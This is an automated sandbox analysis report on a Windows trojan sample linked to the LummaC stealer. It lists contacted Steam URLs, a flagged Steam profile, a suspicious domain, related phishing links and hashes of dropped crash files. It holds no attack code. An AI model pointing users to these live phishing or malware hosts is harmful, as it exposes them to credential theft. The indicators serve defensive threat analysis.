                                                                              https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://store.steampowered.com/mobilefile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://steamcommunity.com/file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://store.steampowered.com/about/file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • URL Reputation: malware
                                                                                    unknown
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    104.21.53.8
                                                                                    sergei-esenin.comUnited States
                                                                                    13335CLOUDFLARENETUStrue
                                                                                    104.102.49.254
                                                                                    steamcommunity.comUnited States
                                                                                    16625AKAMAI-ASUStrue
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1532752
                                                                                    Start date and time:2024-10-13 21:39:12 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 4m 53s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:10
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:file.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.evad.winEXE@3/9@10/2
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:Failed
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • VT rate limit hit for: file.exe
                                                                                    TimeTypeDescription
                                                                                    15:40:04API Interceptor3x Sleep call for process: file.exe modified
                                                                                    15:40:29API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    104.21.53.8SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                        104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                        • www.valvesoftware.com/legal.htm
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        sergei-esenin.comSecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        steamcommunity.comSecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                        • 104.102.49.254
                                                                                                        https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                        • 104.102.49.254
                                                                                                        https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                        • 104.102.49.254
                                                                                                        https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                        • 104.102.49.254
                                                                                                        https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUSSecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.206.204
                                                                                                        SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.96.3
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        https://fexegreuyauja-8124.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 172.67.75.166
                                                                                                        https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.17.25.14
                                                                                                        https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 172.67.69.226
                                                                                                        http://iglawfirm.com/services/antai-fr/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        https://www.iglawfirm.com/services/antai-fr/infospage.phpGet hashmaliciousUnknownBrowse
                                                                                                        • 104.17.24.14
                                                                                                        http://bancolombia-personas-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                        • 172.67.74.152
                                                                                                        http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.26.12.205
                                                                                                        AKAMAI-ASUSSecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        https://steamcommunityv.com/redeemwalletcode/gift/514590383Get hashmaliciousUnknownBrowse
                                                                                                        • 88.221.169.65
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.102.49.254
                                                                                                        SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                        • 104.102.49.254
                                                                                                        https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                        • 104.102.49.254
                                                                                                        https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                        • 104.102.49.254
                                                                                                        https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                        • 104.102.49.254
                                                                                                        https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                        • 104.102.49.254
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.53.8
                                                                                                        • 104.102.49.254
                                                                                                        No context
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):1.0398265969958222
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:P1IEmJ1vVPlktS0Wbk4E3juFlc/9Q2x1zuiFk9Z24IO8ThB:yVN6ZWbkrjeMq41zuiFsY4IO8r
                                                                                                        MD5:99558CF4E4B2B47D60DF83A03540CA57
                                                                                                        SHA1:93B405755CAD1641A3818F8C03EA41BF1D9F8828
                                                                                                        SHA-256:BB8F5DDAFA961F2DF70EBA55DAEC7234529E9E70B37853C72DDD0A8CCF436937
                                                                                                        SHA-512:F28A574E2967AC7DA69EA1E595D332893056FCA8FBD3C871D6702696F49D870CF15EF5CF91DCBA3D1A81241F8C7482787420F5C88357EF4D24EA87937CC4E5EB
                                                                                                        Malicious:true
                                                                                                        Reputation:low
                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.2.2.0.2.9.6.0.9.3.2.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.2.2.0.3.0.1.7.1.8.2.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.2.a.a.7.a.8.-.9.8.e.8.-.4.2.7.2.-.9.b.a.7.-.c.b.f.6.f.b.4.7.7.5.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.d.d.a.5.1.b.-.1.e.d.b.-.4.1.c.5.-.9.b.e.2.-.d.6.2.8.2.4.f.4.c.b.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.8.-.0.0.0.1.-.0.0.1.4.-.f.3.2.f.-.2.4.b.3.a.7.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.3.8.3.b.3.c.d.f.3.d.a.4.d.b.d.1.5.c.5.5.1.0.6.6.4.7.3.9.a.5.4.7.d.b.b.6.a.d.2.0.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):1.0473552553776384
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:igaN+SmJ1v3Plrk0TYUZzE3juFlc/9Q2x1zuiFk9Z24IO8khB:V3NLTYUZojeMq41zuiFsY4IO8+
                                                                                                        MD5:E737773731E5F609FD63C66C31205B30
                                                                                                        SHA1:104885FAD45889CA39E02319A7BAA0782737D883
                                                                                                        SHA-256:10388F873EC40C0E093093FEE9F6359F5720D14F31CF40C985A511016731AD5E
                                                                                                        SHA-512:52DE0A1CA88F4FAFA5B9F643250C9FD4B6B7B607943846CA66DEC0854038EA57080102AEEA69371D78CD6BE91EB738D6EE62C73FF365881CFA511598B0F0E5C0
                                                                                                        Malicious:true
                                                                                                        Reputation:low
                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.2.2.0.0.8.8.5.1.3.3.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.2.2.0.0.9.7.2.6.3.8.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.7.a.f.5.6.4.-.8.2.b.0.-.4.d.4.8.-.8.0.0.7.-.6.8.b.1.8.1.7.e.9.e.b.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.2.7.7.b.0.6.-.7.d.f.c.-.4.b.a.6.-.a.c.0.0.-.2.a.4.6.0.9.3.4.9.a.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.8.-.0.0.0.1.-.0.0.1.4.-.f.3.2.f.-.2.4.b.3.a.7.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.3.8.3.b.3.c.d.f.3.d.a.4.d.b.d.1.5.c.5.5.1.0.6.6.4.7.3.9.a.5.4.7.d.b.b.6.a.d.2.0.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.4.:.
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 15 streams, Sun Oct 13 19:40:09 2024, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):283194
                                                                                                        Entropy (8bit):1.4912757474655478
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:3GXGABe4Pa4FXuEZhFF2tY0Tb3QJglO1IH/oHtTRIFDfowAr9:WX0kuXtYSNoHtTRIFDfKr9
                                                                                                        MD5:D7A21B914C9DF1F93AAC006BE17CC80A
                                                                                                        SHA1:3832D07E7B5909F95F36BA70E4C1C551DAF9EC68
                                                                                                        SHA-256:21CE36DE8B45F49FA7D2A7D785E1F1F4420CC79E11853DA42BF3064257648188
                                                                                                        SHA-512:5A51E3652DF23DD9F9928777F34B1EF0378DC7BCACC8FB14745D89D4DD471D3904320CFA75E1F064EAAF0C961848EE5D4A8557454036F934506FC01685C3C3F8
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:MDMP..a..... ........".g........................T................&......................`.......8...........T...........8K...............'...........)..............................................................................eJ......|*......GenuineIntel............T............".g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8360
                                                                                                        Entropy (8bit):3.6903996862520403
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:R6l7wVeJUCH6T6YEIASU92vgkgmf6Q5cCNEpDT89bIXsfz4m:R6lXJb6T6YE/SU9+gkgmfh+CNtIcf5
                                                                                                        MD5:36C9F1FD1B90987B34D11825E646A607
                                                                                                        SHA1:D13B9B0A36531F3408C90A3605925E37AF8A08D4
                                                                                                        SHA-256:52899AC2B3B5111AA0A74B94B941C4A5AA0E230290C5C4E946F977181E98EB10
                                                                                                        SHA-512:9ABEC0FEF5F04FBCA5E98719E390F8D97970134554AE9033A9450A8130C141E157569175B3AE16ABDA91473C0DC9EDAD336E766C9EB47564FB946A3D8DAC7381
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.5.6.<./.P.i.
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4661
                                                                                                        Entropy (8bit):4.420682095672819
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwWl8zsLJg77aI9TgWpW8VY+Ym8M4JjUFu/+q8vUTNT0qrd:uIjflI7dZ7VmJxKgNT0qrd
                                                                                                        MD5:F81208D8B8572F3FB3606CB8BCD47E12
                                                                                                        SHA1:0DF42CD435F7277562471D3CA7923F2C53E33BEC
                                                                                                        SHA-256:E8B163A11F6CE8232B7DF018821EFF4096BEB74D2776EFBDFE9EFEDFA61DC95A
                                                                                                        SHA-512:EC58EFA86BB7039A2BEDBCDA030433A97D0C27E7569729C3C53E4A5D3645A05297BEE04B4526C240AA30D95B8F690D386D97E891C31BB29703CFD267FA8EAB30
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542082" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Sun Oct 13 19:40:29 2024, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):46138
                                                                                                        Entropy (8bit):2.672188138458232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:NymHJpOjtOABefQDxFjfTneoem+SEvZ/k/feHe324JGwOxME/Jaj4WP:lJkkABeYtZn4m+NR8/fGem4IwORsj4
                                                                                                        MD5:754B2364BB380038E6DEC2CE95970136
                                                                                                        SHA1:19B99478DD20B6327B9D9FD680DCA22CB8A724B5
                                                                                                        SHA-256:95B6F6752BB9517F3BDD298D289C9B67767C4C2663D613E3CC3FAA5A49901C00
                                                                                                        SHA-512:4D79886AFE5A0D33DB495A874D20EA89160A12DDB8B69FB0827759B6F2BD1A144A1043ED4670561421A836CEAF38BD9664CE87977FFCE27E4040FF6B83686972
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:MDMP..a..... .......-".g............4...........T...H............ ......$...\0..........`.......8...........T............J...i...........!...........#..............................................................................eJ.......$......GenuineIntel............T............".g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8296
                                                                                                        Entropy (8bit):3.677718980132204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:R6l7wVeJUC36z6YEITSU9QgYgmfBGePEpr489bqPsfdOm:R6lXJr6z6YEsSU9QgYgmfZPcq0ft
                                                                                                        MD5:78582901AA838768FD88A29E31B65465
                                                                                                        SHA1:9275D911E9E3AD51BD7F6EB311F96F171AF23183
                                                                                                        SHA-256:DA4BD8E0697D1D4578D1E77F7CD19D7BE8695218CEF3A38A25CDAF1C1BDF7792
                                                                                                        SHA-512:916408414663CCFAC355D05BAE82C9483D4B9A5988AF6C1FAE05E5D79E6BE03B2D783A3E513E0B983A9C8AAA1D012E8CD254466985A31BC3E81777C3E64D774F
                                                                                                        Malicious:false
                                                                                                        Reputation:low
